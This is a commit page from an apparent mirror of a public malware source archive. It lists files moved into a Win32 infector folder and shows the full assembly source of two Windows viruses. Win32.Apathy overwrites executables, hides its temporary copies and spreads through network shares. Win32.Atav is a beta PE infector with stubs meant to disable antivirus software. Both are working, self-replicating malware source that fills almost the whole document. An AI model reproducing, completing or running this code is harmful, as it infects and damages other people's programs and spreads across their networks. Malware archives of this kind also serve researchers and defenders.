daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 15:29:23 +00:00
Code Issues Projects Releases Wiki Activity

Updated dir structure in Win32

Browse Source
This commit is contained in:
TheDuchy
2020-10-16 23:26:21 +02:00
parent b022d14189
commit cfc6699241
173 changed files with 0 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Win32/Infector/I-worm.Icecubes.asm
+4982
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/MonsterWorm.7z
BIN
View File
Binary file not shown.
Win32/Infector/Virus.Win32.Ming.asm
+1028
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.99WaysToDie.asm
+1886
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Alicia.asm
+3312
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Alma.asm
+1125
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Apathy.asm
+825
View File
@@ -0,0 +1,825 @@
;
; - Win32.Apathy -
; -b0z0/iKX-
;
; This is a PE infector that works in 9x/NT systems and infected files in
; that enviroments will work correctly after infection (I'm not sure that
; there is a secret bu... feature that could make them not to work).
; While infecting Win32.Apathy will overwrite the original PE start with
; a copy of itself, thus avoiding entirely the API searching problem,
; saving the original piece of code at the end of the infected file. To
; maintain compatibility with NT and to make disinfection a little tricky
; the virus will also change the .rsrc RVA and consequently all the resource
; entryes to some standard position. So just copying the original piece of
; will result in damaging the executable. The original file will be
; reconstructed in a temporary file and executed there as a new process.
; Check code for other things about the infection process and such.
; Win32.Apathy will also try to spread through the network (microsoft
; network or SMB or how you wanna call it) by scanning some connected
; resources and trying to infect files over there.
;
; The virus has been quite tested under Win95/98/NT4
;
; Win32.Apathy born really a lot of time ago, I started coding this just
; after Xine#3 was out, but then the whole project (like all my other VX
; projects) was stopped until about december 1998 when I decided to finish
; at least something. The code tho is not optimized at all, could not be
; too clear in some parts, I just wanted to materialize a few ideas I had
; and I didn't really care too much to optimize or something this.
;
; The virus name is quite obvious, but:
; apathy: the state of having no wish to act and no enthusiasm
;
; Thanx to StarZero for cool hints and notes!
;
; For any kind of info or something contact me at cl0wn@geocities.com
;
.386
.model flat
; kernel32 ones we need
extrn SetFileAttributesA:PROC
extrn Sleep:PROC
extrn GetWindowsDirectoryA:PROC
extrn GetTickCount:PROC
extrn lstrcpy:PROC
extrn ExitProcess:PROC
extrn SetFileTime:PROC
extrn DeleteFileA:PROC
extrn GetTempPathA:PROC
extrn GetTempFileNameA:PROC
extrn CreateProcessA:PROC
extrn CopyFileA:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn GetCommandLineA:PROC
extrn CloseHandle:PROC
extrn ReadFile:PROC
extrn HeapAlloc:PROC
extrn GetProcessHeap:PROC
extrn CreateFileA:PROC
extrn CreateFileMappingA:PROC
extrn MapViewOfFile:PROC
extrn UnmapViewOfFile:PROC
extrn GetFileSize:PROC
extrn CreateMutexA:PROC
extrn GetLastError:PROC
; for network from mpr.dll
extrn WNetOpenEnumA:PROC
extrn WNetEnumResourceA:PROC
.data
vname db 0,'Win32.Apathy by '
author db '-b0z0/iKX-',0 ; used as mutex object name
fsearch:
f_attrib dd 00h
f_ctime dd 00h,00h
f_atime dd 00h,00h
f_wtime dd 00h,00h
f_size_hi dd 00h
f_size_lo dd 00h
f_reserved dd 00h,00h
f_name db 104h dup (?)
f_alt_name db 0eh dup (?)
msg db 'i am nobody except genetic runaround',0
ff_handle dd 00h
f_handle dd 00h
dotdot_mask db '..',0
exemask db '*.EXE',0
v_map_handle dd 00h
v_file_handle dd 00h
orig_virus_p dd 00h
pref db 'ikx',0 ; tmp file name prefix
path_position dd offset new_path
new_path db 112h dup (?) ; max_path + a bit more
tmp_name db 112h dup (?)
process_info dd 4 dup (?)
; STARTUPINFO structure for new process
startup_info dd 10h ; lenght of this structure
dd 00h,00h
title_startup dd 00h ; pointer to title for console progs
;
has_infected db 00h ; 00h no, 01h yes
virus_phase db 07h ; 07h infecting .
; 06h infecting windows directory
; 05h infecting network 1 try
; 04h infecting network 2 try
; 03h infecting ..
; 02h infecting network 3 try
; 01h infecting network 4 try
netspace equ 4000h ; 16kb as suggested. place for 200h
; entryes... way too much anyway
enum_handle dd 00h ; handle of Net enumeration
enum_count dd 1ffh ; how many got / how many to get
enum_size dd netspace ; size of memory avaiable for results
r_point dd 0h
; here begins the virus code
.code
; equs
exesize equ 1502h ; size of virus executable
pe_begin equ 100h ; where PE header begins in virus
file_align equ 200h ; file align value (= to linker one)
read_exe equ 4096d ; how much victim to read to check
marker equ '0z0b' ; infection marker
wait_time equ 2604d ; time between each search
sleep_time equ 7919d ; add sleep time after good infection
f_shit equ 2000h ; first gen dim
; the marker must be set at offset 58h of the PE once compiled
startcode:
call GetProcessHeap
push (exesize + read_exe + netspace)
push 8h ; zero memory
push eax
call HeapAlloc ; allocate some memory from our heap
mov dword ptr [orig_virus_p],eax
push offset new_path
push 112h
call GetTempPathA
push offset tmp_name ; create a temporary name
push large 0
push offset pref
push offset new_path
call GetTempFileNameA
call GetCommandLineA ; get our name
cmp byte ptr [eax],22h ; " this is strange, sometimes cmdline
jne not_thatshit ; is enclosed in "", so we must take
inc eax ; care if they are there
push eax
find_ending:
cmp byte ptr [eax],22h
je delete_ending_aswell
inc eax
jmp find_ending
delete_ending_aswell:
mov byte ptr [eax],20h
pop eax
not_thatshit:
push eax
mov dword ptr [title_startup],eax
search_end:
inc eax
cmp byte ptr [eax-1],'.' ; go to the extension
jne search_end
cmp byte ptr [eax+3],20h ; space
je found_end
cmp byte ptr [eax+3],00h ; end of string
jne search_end
found_end:
add eax,3 ; point on end of exe name
push eax
push eax ; copy possible command line options
push offset new_path ; to the buffer
call lstrcpy
pop eax
mov byte ptr [eax],0 ; put null to open/copy it
pop eax
push large 0
push offset tmp_name
push eax ; copy ourselves to another name
call CopyFileA
or eax,eax
jz exit_critical_temp
push 02h ; file attribute hidden
push offset tmp_name
call SetFileAttributesA
xor eax,eax
push eax
push large 80h
push large 3
push eax
push eax
push 0c0000000h ; readwrite
push offset tmp_name ; open the temporary file
call CreateFileA
inc eax ; check if opened ok
jz exit_critical_temp
dec eax
mov dword ptr [v_file_handle],eax
push eax
push large 0
push eax ; handle
call GetFileSize ; get size of file we are running from
xchg ecx,eax ; copied in a tmp file
pop eax
push ecx ; size
xor ecx,ecx
push ecx
push ecx ; entire file
push ecx
push large 04h
push ecx
push eax
call CreateFileMappingA
cdq
or eax,eax
jz exit_critical_temp ; eax map handle
push eax ; mapping handle
push edx
push edx
push edx
push large 02h
push eax
call MapViewOfFile
or eax,eax
pop ebx ; mapping handle
je exit_critical_temp
cld
mov esi,eax
mov edi,dword ptr [orig_virus_p]
mov ecx,exesize
mov edx,ecx
rep movsb
pop ecx ; size
cmp ecx,f_shit
jz first_generation
sub ecx,edx
sub ecx,edx
push ebx ; map handle
mov edi,esi
add esi,ecx
mov ecx,edx
sub edi,ecx
push edi ; to beginning of file mapping in mem
push edi
rep movsb ; restore original
pop edi
mov esi,edi ; now we must restore the resources
add edi,dword ptr [edi+3ch] ; on PE
mov eax,dword ptr [edi+8ch] ; resources lenght
or eax,eax
jz no_resourz
mov eax,dword ptr [edi+88h] ; resources RVA
add edi,0f8h+0ch ; to objects
srs_loo:
cmp eax,dword ptr [edi] ; is the resources one?
je got_srsr
add edi,28h ; lenght of an object
jmp srs_loo
got_srsr:
add esi,dword ptr [edi+08h] ; physical offset of resources
mov ebx,4000h ; fixed virus resources RVA
sub ebx,eax
call rsrs_change ; call changer
no_resourz: ; everything is ready again
call UnmapViewOfFile
call CloseHandle
push dword ptr [v_file_handle] ; close virus file
call CloseHandle
xor eax,eax
push offset process_info
push offset startup_info
push eax
push eax
push eax
push eax
push eax
push eax
push offset new_path ; to command line options
push offset tmp_name ; to file to execute
call CreateProcessA ; run host executable
first_generation:
push offset author ; name of the mutex object
push large 1
push large 0
call CreateMutexA ; create one
call GetLastError ; check if one with the same name
or eax,eax ; already exist. if so virus is already
jnz exit_critical_temp ; running as another process
mov eax,offset exemask
search_loop:
push offset fsearch
push eax
call FindFirstFileA ; search for some victims
cmp eax,-1
je end_file_search
mov dword ptr [ff_handle],eax
infect_file:
push offset f_name
push dword ptr [path_position] ; copy found file
call lstrcpy ; after directory
push 80h ; FILE_ATTRIBUTE_NORMAL
push offset new_path
call SetFileAttributesA ; delete attributes
or eax,eax
jz error_attributes
xor eax,eax
push eax
push large 80h
push large 3
push eax
push eax
push 0c0000000h ; readwrite
push offset new_path ; full file name to file to
call CreateFileA ; infect
inc eax
jz error_opening
dec eax
mov dword ptr [f_handle],eax
push eax
mov edx,dword ptr [orig_virus_p] ; virus heap
add edx,exesize ; read data is after original
push edx
push large 0
push offset f_size_hi ; some place to store nr of
push read_exe ; readed bytes
push edx
push eax
call ReadFile ; read header
pop edx
pop eax
cmp word ptr [edx],'ZM' ; exe?
jne not_to_infect
mov ecx,dword ptr [edx+3ch] ; pointer to PE header
cmp ecx,(read_exe - 4) ; is the PE header in readed
jae not_to_infect ; chunk of executable?
add edx,ecx
cmp dword ptr [edx],'EP'
jne not_to_infect
cmp dword ptr [edx+58h],marker ; already infected?
je not_to_infect
test dword ptr [edx+3ch],(file_align - 1)
jnz not_to_infect ; must have an align cmptible
mov ecx,dword ptr [f_size_lo] ; file size (assume <= 4gb)
cmp ecx,(10 * 1024) ; not too small files
jbe not_to_infect ; leave it
mov ebx,dword ptr [edx+8ch] ; resource size
or ebx,ebx
jz no_resp
mov ebx,dword ptr [edx+88h] ; pointer to resources
add edx,(0f8h + 0ch)
search_rsrcs:
cmp ebx,dword ptr [edx] ; is the resources one?
je got_rsrcs
add edx,28h ; lenght of an object
jmp search_rsrcs
got_rsrcs:
sub edx,0ch ; on beginning of this object
cmp dword ptr [edx+14h],exesize ; are resources after the virus
jbe not_to_infect ; size (this is won't be overw)
mov ebx,edx
no_resp:
mov dword ptr [r_point],ebx
add ecx,exesize ; will extend it by exesize
xor edx,edx
push edx
push ecx
push edx
push large 04h
push edx
push eax
call CreateFileMappingA
cdq
or eax,eax
jz not_to_infect
mov dword ptr [v_map_handle],eax
push edx
push edx
push edx
push large 02h
push eax
call MapViewOfFile
or eax,eax
jz close_map_exit
mov edi,eax
push edi
mov esi,edi
add edi,dword ptr [f_size_lo]
mov edx,edi
mov ecx,exesize ; save original code after the end
push ecx
rep movsb
pop ecx
pop edi
push edi
mov esi,dword ptr [orig_virus_p] ; on vir
rep movsb ; copy virus body
pop edi
push edi
mov esi,edx
mov edx,edi
add esi,dword ptr [esi+3ch] ; on PE
mov ecx,4000h ; image size of virus file w/o rsrcs
mov dword ptr [edi+pe_begin+50h],ecx ; correct image size
mov word ptr [edi+pe_begin+6],3h ; number of virus objects
mov eax,dword ptr [r_point] ; pointer to resources object
mov ebx,dword ptr [esi+8ch] ; resource size
mov dword ptr [edi+pe_begin+8ch],ebx
mov dword ptr [edi+pe_begin+88h],0h ; zero resurce RVA by default
or eax,eax ; resources length 0?
jz no_resources
mov ebx,dword ptr [esi+88h] ; resource RVA
sub ebx,ecx
mov dword ptr [edi+pe_begin+88h],ecx ; set resources pointer
inc word ptr [edi+pe_begin+6] ; number of objects
mov esi,eax ; on resources object
add edi,(pe_begin + 0f8h + (3*28h))
mov ecx,028h ; copy resources object
rep movsb
mov esi,edx ; on beginning of file
mov dword ptr [edi-28h+0ch],4000h
mov eax,dword ptr [edi-28h+08h] ; object virtual size
add eax,(1000h - 1)
and eax,0fffff000h
add dword ptr [edi - (0f8h + (4*28h)) + 50h],eax ; to image size
mov eax,dword ptr [edi-28h+14h] ; physical offset of resources
add esi,eax
call rsrs_change ; change those
no_resources:
call UnmapViewOfFile ; unmap view of file
inc byte ptr [has_infected] ; good infection, so a pause
; will occour
close_map_exit:
push dword ptr [v_map_handle]
call CloseHandle ; close mapping handle
mov eax,dword ptr [f_handle]
push eax
push offset f_wtime
push offset f_atime
push offset f_ctime
push eax
call SetFileTime ; restore original file time
pop eax
not_to_infect:
push eax ; file handle
call CloseHandle ; close infected file
error_opening:
push dword ptr [f_attrib] ; restore old attributes to file
push offset new_path
call SetFileAttributesA
error_attributes:
mov eax,wait_time ; so it won't work too much
dec byte ptr [has_infected]
jnz no_infection
add eax,sleep_time ; if a file was infected then make a
; longer pause
no_infection:
push eax
call Sleep ; pause until next one
mov byte ptr [has_infected],00h ; reset infection mark
push offset fsearch
push dword ptr [ff_handle]
call FindNextFileA
or eax,eax ; no more files?
jz end_file_search
jmp infect_file ; else infect
end_file_search:
call GetTickCount ; should we go deeper in dir
shr eax,1 ; from actual position?
jc next_phase
mov esi,dword ptr [path_position] ; search from last dir fwd
mov dword ptr [esi],' .*' ; to search dirs and such
push eax
push offset fsearch
push offset new_path
call FindFirstFileA
mov dword ptr [ff_handle],eax
cmp eax,-1
pop eax
je next_phase ; no dirs in here
check_dir:
test dword ptr [f_attrib],10h ; is a directory?
jz search_next_dir
cmp byte ptr [f_name],'.' ; not . or ..
je search_next_dir
shr eax,1 ; select randomly if walk into
jnc search_next_dir ; this or try another
mov eax,dword ptr [path_position] ; put after actual search path
mov esi,offset f_name ; point to directory name
jmp copy_from_eax
search_next_dir:
push eax
push offset fsearch
push dword ptr [ff_handle] ; search next
call FindNextFileA
or eax,eax ; no more directoryes?
pop eax
jnz check_dir
next_phase:
dec byte ptr [virus_phase]
mov al,byte ptr [virus_phase]
or al,al ; phases finished
jz farewell_and_goodnight
cmp al,03h ; search in ..
je search_dotdot
cmp al,06h ; windows directory phase
jne network_work
mov esi,offset new_path
push 104h ; buffer lenght
push esi ; search in windoze directory
call GetWindowsDirectoryA
jmp copy_and_gosearch
search_dotdot:
mov esi,offset dotdot_mask
jmp copy_and_gosearch
network_work:
xor ebx,ebx
find_resource:
push offset enum_handle
push ebx ; pointer to NETSOURCE structure to use
push large 3 ; CONNECTABLE | CONTAINER
push large 1 ; RESOURCETYPE_DISK
push large 2 ; RESOURCE_GLOBALNET
call WNetOpenEnumA
or eax,eax ; 0 = NO_ERROR
jnz next_phase ; on error just skip this phase
mov eax,dword ptr [orig_virus_p] ; pointer to heap
add eax,(exesize + read_exe) ; after other data
mov dword ptr [enum_count],1ffh ; get max entryes
push eax
push offset enum_size ; avaiable memory for results
push eax ; where to place results
push offset enum_count ; how many to enumerate
push dword ptr [enum_handle] ; handle of enumeration
call WNetEnumResourceA
pop ebx
or eax,eax ; 0 = NO_ERROR
jnz next_phase ; if some error skip
mov ecx,dword ptr [enum_count] ; number of entryes got
call GetTickCount ; random
xor edx,edx
div ecx
mov eax,20h ; lenght of one entry
mul edx ; select which one
add ebx,eax
test dword ptr [ebx+0ch],01h ; is an usable resource
jz find_resource
; if not should be a container
; (local or remote) so continue
; to next level
got_resource:
mov esi,dword ptr [ebx+14h] ; here it is
copy_and_gosearch:
mov eax,offset new_path
copy_from_eax:
push eax
push esi ; path to network or dir
push eax ; where to copy
call lstrcpy
pop eax
loop_searchzero:
cmp byte ptr [eax],00h
je got_null_termination ; find end
inc eax
jmp loop_searchzero
got_null_termination:
mov byte ptr [eax],'\' ; add \
inc eax
mov dword ptr [path_position],eax
push offset exemask ; and now copy the *.exe mask
push eax
call lstrcpy
mov eax,offset new_path
jmp search_loop
farewell_and_goodnight:
exit_critical_temp:
; before exiting delete some temp files (the still used ones will be deleted
; next time since are actually in use)
mov esi,offset tmp_name ; has temp path + last temp name
search_dottmp:
inc esi
cmp word ptr [esi],'i\' ; find beginning of name
jne search_dottmp
inc esi
inc esi
cmp word ptr [esi],'xk'
jne search_dottmp
got_end:
inc esi
inc esi
push esi
mov dword ptr [esi],'mt.*' ; set delete ikx*.tmp
mov word ptr [esi+4],'p' ; p + null termination
push offset fsearch
push offset tmp_name
call FindFirstFileA
pop edi ; after ikx in temp name
cmp eax,-1
je exit_deletion
delete_temps:
mov esi,(offset f_name + 3)
mov ecx,9h ; sometimes will be shorter but wc
push edi
rep movsb
pop edi
push eax ; preserve handle
push offset tmp_name
call DeleteFileA ; could fail if file is
pop eax ; used, but np
push eax
push offset fsearch
push eax
call FindNextFileA ; find next to delete
or eax,eax
pop eax
jnz delete_temps
exit_deletion:
exit:
push LARGE -1 ; that's all, will release also
call ExitProcess ; our mutex object
rsrs_change:
; EBX = value to substract to each resource element
; ESI = pointer to resources
xor edx,edx ; will keep number of data elements
push ebx
search_rsr:
add esi,10h
movzx ecx,word ptr [esi - 2] ; nr of named and integer
add cx,word ptr [esi - 4] ; entryes in this dir
adc ecx,0
na_nasl:
mov ebx,dword ptr [esi + 4]
test ebx,80000000h ; is a resource data entry?
jnz is_subdir
inc edx
is_subdir:
add esi,8 ; on next
loop na_nasl
cmp dword ptr [esi],00h ; finished ?
je search_rsr
pop ebx
mov ecx,edx
change_res:
sub dword ptr [esi],ebx ; sub requested value
add esi,10h
loop change_res ; change all entryes
ret
end startcode
Win32/Infector/Win32.Aris.asm
+1977
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Astrix.asm
+2101
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Atav.asm
+760
View File
@@ -0,0 +1,760 @@
;-------------------------------
;Fuck Beta virus Atav by Radix16
;-------------------------------
;Tak tohle je mozna prvni verze viru Atav ,nevim to jiste protoze se mi gdesi stratila.
;Sami negdy uvidite zdrojak plne verze se hodne lisi s timhle TOHLE JE LAMME fuj!
;Uz se na toto nemuzu ani divat ,nestojito ani za popis :)
;
;Nova verze mela by obsahovat : Poly , Update Internet , Fast infection .Ring3 -> Ring0
;Takgze i nejake novinky pro svet :) ,ale jinac se presouvam i na LINUX :)))
;
;Zatim Zdar :)
.386p
.Model Flat
jumps
.Data
db ?
extrn GetModuleHandleA :proc
extrn ExitProcess :proc
extrn MessageBoxA :proc
VirusSize equ Virus_End-Start
SizeCrypt equ Crypt_End-Crypto
include mz.inc
include pe.inc ;include files from Jacky Qwerty/29A
include win32api.inc
include useful.inc
;////////////////////////////M Y C O D E ///////////////////////////////////////////////////////
.Code
Virus_Size equ Virus_End-Start
Start:
pushad
@SEH_SetupFrame <jmp seh_fn>
xchg [edx], eax
seh_fn:
call Base1
Base1:
pop ebp
sub ebp,offset Base1
FirstGeneration:
call Mutate1
Crypto:
Virus_Start:
call Kernel?
mov esi, ebx
mov ebx,[esi+10h]
add ebx,[ebp + imagebase]
mov [ebp + offset f_RVA],ebx
mov eax,[esi]
jz Not_Found_Kernel32
mov esi,[esi]
add esi,[ebp + offset imagebase]
mov edx,esi
mov ecx,[ebp+offset importsize]
mov eax,0
Jmp Get_Module_Handle
coded db 'Win32.ATAV (c)oded by Radix16[MIONS]',0
maintext db 'Heayaaa',0
Kernel?:
mov esi,[ebp + offset imagebase]
cmp word ptr[esi],'ZM'
jne GetEnd
add esi,3ch
mov esi,[esi]
add esi,[ebp + offset imagebase]
push esi
cmp word ptr [esi], 'EP' ;Win App PE
jne GetEnd
add esi, 28h
mov eax, [esi]
mov [ebp+entrypoint], eax
pop esi
add esi,80h
mov eax,[esi]
mov [ebp+importvirtual],eax
mov eax,[esi+4]
mov [ebp+importsize],eax
mov esi,[ebp+importvirtual]
add esi,[ebp + offset imagebase]
mov ebx,esi
mov edx,esi
add edx,[ebp + importsize]
Search_Kernel:
mov esi,[esi + 0ch]
add esi,[ebp + offset imagebase]
cmp [esi],swKernel32
Je K32Found
add ebx, 14h
mov esi, ebx
cmp esi, edx
jg Not_Found_Kernel32
jmp Search_Kernel
K32Found:
ret
Not_Found_Kernel32:
mov eax, dword ptr [esp]
find_base_loop:
cmp dword ptr [eax+0b4h], eax
je Found_Adress
dec eax
cmp eax, 40000000h
jbe assume_hardcoded
jmp find_base_loop
assume_hardcoded:
mov eax, 0BFF70000h
cmp word ptr [eax], 'ZM'
je Found_Adress
mov eax, 07FFF0000h
Found_Adress:
mov [ebp+offset Kernel32], eax ;Mam ju :))
mov edi, eax
cmp word ptr [edi],'ZM'
jne GetEnd
mov edi, [edi+3ch]
add edi, [ebp+offset Kernel32]
cmp word ptr [edi],'EP'
jne GetEnd
pushad
mov esi,[edi+78H]
add esi,[ebp+offset Kernel32]
mov [ebp+offset Export],esi
add esi,10H
lodsd
mov [ebp+offset basef],eax
lodsd
lodsd
mov [ebp+offset limit],eax
add eax, [ebp+offset Kernel32]
lodsd
add eax,[ebp+offset Kernel32]
mov [ebp+offset AddFunc],eax
lodsd
add eax, [ebp+offset Kernel32]
mov [ebp+offset AddName],eax
lodsd
add eax,[ebp+offset Kernel32]
mov [ebp+offset AddOrd],eax
mov esi,[ebp+offset AddFunc]
lodsd
add eax,[ebp+offset Kernel32]
mov esi, [ebp+offset AddName]
mov [ebp+offset Nindex], esi
mov edi,[esi]
add edi,[ebp+offset Kernel32]
mov ecx,0
mov ebx,offset API_NAMES
add ebx,ebp
TryAgain:
mov esi,ebx
MatchByte:
cmpsb
jne NextOne
cmp byte ptr [edi], 0
je GotIt
jmp MatchByte
NextOne:
inc cx
cmp cx, word ptr [ebp+offset limit]
jge GetEnd
add dword ptr [ebp+offset Nindex], 4
mov esi, [ebp+offset Nindex]
mov edi, [esi]
add edi, [ebp+offset Kernel32]
jmp TryAgain
GotIt:
mov ebx,esi
inc ebx
shl ecx,1
mov esi, [ebp+offset AddOrd]
add esi,ecx
xor eax,eax
mov ax,word ptr [esi]
shl eax, 2
mov esi,[ebp+offset AddFunc]
add esi,eax
mov edi,dword ptr [esi]
add edi,[ebp+offset Kernel32]
mov [ebp+offset ddGetProcAddress], edi
popad
mov esi, offset swExitProcess
mov edi, offset ddExitProcess
add esi, ebp
add edi, ebp
Repeat_find_apis:
push esi
mov eax,[ebp+offset Kernel32]
push eax
mov eax,[ebp+offset ddGetProcAddress]
call eax
cmp eax,0
je GetEnd
stosd
repeat_inc:
inc esi
cmp byte ptr [esi], 0
jne repeat_inc
inc esi
cmp byte ptr [esi], 0FAh
jne Repeat_find_apis
Jmp Virus_Game
Get_Module_Handle:
cmp dword ptr [edx],0
je Not_Found_Kernel32
cmp byte ptr [edx+3],80h
je Not_Here
mov esi,[edx]
push ecx
add esi,[ebp + offset imagebase]
add esi,2
mov edi,offset gmhGetModuleHandleA
add edi,ebp
mov ecx,gmhsize
rep cmpsb
pop ecx
je f_GetModuleHandelA
Not_Here:
inc eax
add edx,4
loop Get_Module_Handle
jmp Not_Found_Kernel32
f_GetModuleHandelA:
shl eax,2
mov ebx,[ebp+offset f_RVA]
add eax,ebx
mov eax,[eax]
mov edx,offset se_Kernel32
add edx,ebp
push edx
call eax
cmp eax,0
jne Found_Adress
Jmp Not_Found_Kernel32
Virus_Game:
push offset SystemTime
mov eax,[ebp + ddGetSystemTime]
call eax
cmp byte ptr [SystemTime.wMonth],0Ah
jne Next_Game
cmp byte ptr [SystemTime.wDay],0Fh
jne Next_Game
jmp Ok_Day_Month
Next_Game:
mov dword ptr [ebp+offset infections], 0Ah
call SearchFiles
inc eax
jz GetEnd
dec eax
push eax
mov ecx,[edi.FileSizeLow] ;zisti velikost souboru
lea esi,[edi.FileName]
call Infect
jc _try
dec dword ptr [ebp+offset infections]
cmp word ptr [ebp+offset infections], 0
je All_Done
_try:
push edi
lea edi, [edi.FileName]
mov ecx, 13d
mov al, 0
rep stosb
pop edi
pop eax
push eax
push edi
push eax
call dword ptr [ebp+offset ddFindNextFileA]
test eax,eax
jz All_Done
mov ecx,[edi.FileSizeLow] ;zisti velikost souboru
lea esi,[edi.FileName]
call Infect
jc failinfection
dec dword ptr [ebp+infections]
failinfection:
cmp dword ptr [ebp+infections], 0
jne _try
All_Done:
pop eax
GetEnd:
cmp ebp, 0
je _exit
mov eax,[ebp + offset oldip]
add eax,[ebp + offset imagebase]
jmp eax
_exit:
push 0
mov eax, [ebp+offset ddExitProcess]
call eax
PEheader dd 0
oldip dd 0
oldsize dd 0
newsize dd 0
incsize dd 0
newip dd 0
Infect proc
pushad
add ecx,VirusSize ;pricti virus k souboru
mov word ptr [ebp+infectionflag], 0
mov [ebp + offset memory],ecx ; nastav max velikost pro mapovani souboru
call OpenFile ;volej funkci pro otevreni souboru
mov [ebp+offset filehandle], eax ;
inc eax ; eax -1
jz Endus ; chyba? jestli ne tak jed dal
call CMapFile
or eax,eax
jz Endus
call MapView
or eax,eax
jz Exit_Map
mov esi,eax
mov [ebp+offset mapaddress],esi
cmp word ptr[esi],'ZM' ;Zacina typickymi znaky jako EXE
jne UnMapw
mov ebx,dword ptr[esi+3ch]
cmp word ptr [esi+ebx],'EP' ;Je to PE
jne UnMapw
add esi,ebx
mov [PEheader+ebp], esi
mov eax, [esi+28h]
mov [oldip+ebp],eax ;Uloz skok
mov eax,[esi+3ch]
push eax
xor eax, eax
mov ebx,[esi+74h]
shl ebx,3
mov ax,word ptr [esi+6h]
dec eax
mov ecx,28h
mul ecx
add esi,78h
add esi,ebx
add esi,eax
or dword ptr ds:[esi+24h],0A0000020h
mov eax,[esi+10h]
mov [oldsize+ebp],eax
add dword ptr [esi+8h],VirusSize
mov eax,[esi+8h]
pop ebx
mov ecx,ebx
div ecx
mov ecx,ebx
sub ecx,edx
mov [esi+10h],ecx
mov eax,[esi+8h]
add eax,[esi+10h]
mov [esi+10h],eax
mov [ebp+offset newsize], eax
mov eax,[esi+0ch]
add eax,[esi+8h]
sub eax,VirusSize
mov [newip+ebp],eax
mov eax,[ebp+offset oldsize]
mov ebx,[ebp+offset newsize]
sub ebx,eax
mov [ebp+offset incsize], ebx
mov eax,[esi+14h]
add eax,[ebp+offset newsize]
mov [ebp+offset newfilesize], eax
mov eax, [esi+14h]
add eax,[esi+8h]
sub eax,VirusSize
add eax,[ebp+offset mapaddress]
call Write_File
mov esi,[ebp+offset PEheader]
mov eax,[newip+ebp]
mov [esi+28h],eax
mov eax, [ebp+offset incsize]
add [esi+50h], eax
UnMapw:
push dword ptr [ebp+offset mapaddress]
mov eax, [ddUnmapViewOfFile+ebp]
Call eax
Exit_Map:
push dword ptr [ebp+offset maphandle]
mov eax,[ddCloseHandle+ebp]
call eax
push dword ptr [ebp+offset filehandle]
mov eax, [ddCloseHandle+ebp]
call eax
Jmp Complete?
infection_error:
stc
jmp Endus
Complete?:
cmp word ptr [ebp+offset infectionflag], 0FFh
je infection_error
clc
Endus:
popad
ret
Infect endp
SearchFilesN proc
ret
SearchFilesN endp
SearchFiles proc
lea edi,[ebp + offset search]
mov eax,edi
push eax
lea eax,[ebp + offset _Exe]
push eax
call dword ptr[ebp+offset ddFindFirstFileA]
ret
SearchFiles endp
memory dd 0
maphandle dd 0
mapaddress dd 0
CMapFile proc
push 0
push dword ptr [ebp+offset memory] ; max.velikost
push 0
push PAGE_READWRITE ;R/W
push 0
push dword ptr [ebp+offset filehandle] ;handle
mov eax,dword ptr [ddCreateFileMappingA+ebp]
call eax
mov [ebp+offset maphandle], eax ;uloz map.handle
ret
CMapFile endp
MapView proc
push dword ptr [ebp+offset memory]
push 0
push 0
push FILE_MAP_ALL_ACCESS
push eax
mov eax,[ddMapViewOfFile+ebp]
call eax
ret
MapView endp
filehandle dd 0 ;rukojet souboru
OpenFile proc
push 0 ;Atributy
push 0
push 3 ;Otevri existuji soubor
push 0
push 1
push 80000000h or 40000000h ;read a write
push esi ;jmeno souboru
mov eax, [ddCreateFileA+ebp] ;
Call eax ;volej
ret ;zpet
OpenFile endp ;v eax je rukojet souboru
Kick_AV proc
push eax
cdq
push edx
; call FindWindowA
xchg eax, ecx
jecxz quit
push edx
push edx
push 12h
push ecx
; call PostMessageA
quit:
ret
Kick_AV endp
Delete_AV proc
Delete_AV endp
Ok_Day_Month:
;////////////////D A T A ////////////////////////////////////////////////////////////////////////
nop
imagebase dd 00400000h
swKernel32 = 'NREK'
Kernel32 dd 00000000h
importvirtual dd ?
importsize dd ?
entrypoint dd ?
f_RVA dd ?
Nindex dd 0
basef dd 0
Export dd 0
limit dd 0
AddFunc dd 0
AddName dd 0
AddOrd dd 0
newfilesize dd 0
infectionflag dw 0
gmhGetModuleHandleA db 'GetModuleHandleA',0
gmhsize = $-gmhGetModuleHandleA
API_NAMES:
swGetProcAddress db 'GetProcAddress',0
swExitProcess db 'ExitProcess',0
swGetVersion db 'GetVersion',0
swFindFirstFileA db 'FindFirstFileA',0
swFindNextFileA db 'FindNextFileA',0
swGetCurrentDirectory db 'GetCurrentDirectoryA',0
swSetCurrentDirectory db 'SetCurrentDirectoryA',0
swDeleteFile db 'DeleteFileA',0
swCreateFileMapping db 'CreateFileMappingA',0
swMapViewOfFile db 'MapViewOfFile',0
swUnmapViewOfFile db 'UnmapViewOfFile',0
swGetFileAttributes db 'GetFileAttributesA',0
swSetFileAttributes db 'SetFileAttributesA',0
swGetDriveType db 'GetDriveTypeA',0
swCreateFile db 'CreateFileA',0
swCloseHandle db 'CloseHandle',0
swGetFileTime db 'GetFileTime',0
swSetFileTime db 'SetFileTime',0
swSetFilePointer db 'SetFilePointer',0
swGetFileSize db 'GetFileSize',0
swSetEndOfFile db 'SetEndOfFile',0
swGetSystemTime db 'GetSystemTime',0
swGetModuleHandle db 'GetModuleHandleA',0
swWriteFile db 'WriteFile',0
db 0FAh
ddGetProcAddress dd 0
ddExitProcess dd 0
ddGetVersion dd 0
ddFindFirstFileA dd 0
ddFindNextFileA dd 0
ddGetCurrentDirectoryA dd 0
ddSetCurrentDirectoryA dd 0
ddDeleteFileA dd 0
ddCreateFileMappingA dd 0
ddMapViewOfFile dd 0
ddUnmapViewOfFile dd 0
ddGetFileAttributesA dd 0
ddSetFileAttributesA dd 0
ddGetDriveTypeA dd 0
ddCreateFileA dd 0
ddCloseHandle dd 0
ddGetFileTime dd 0
ddSetFileTime dd 0
ddSetFilePointer dd 0
ddGetFileSize dd 0
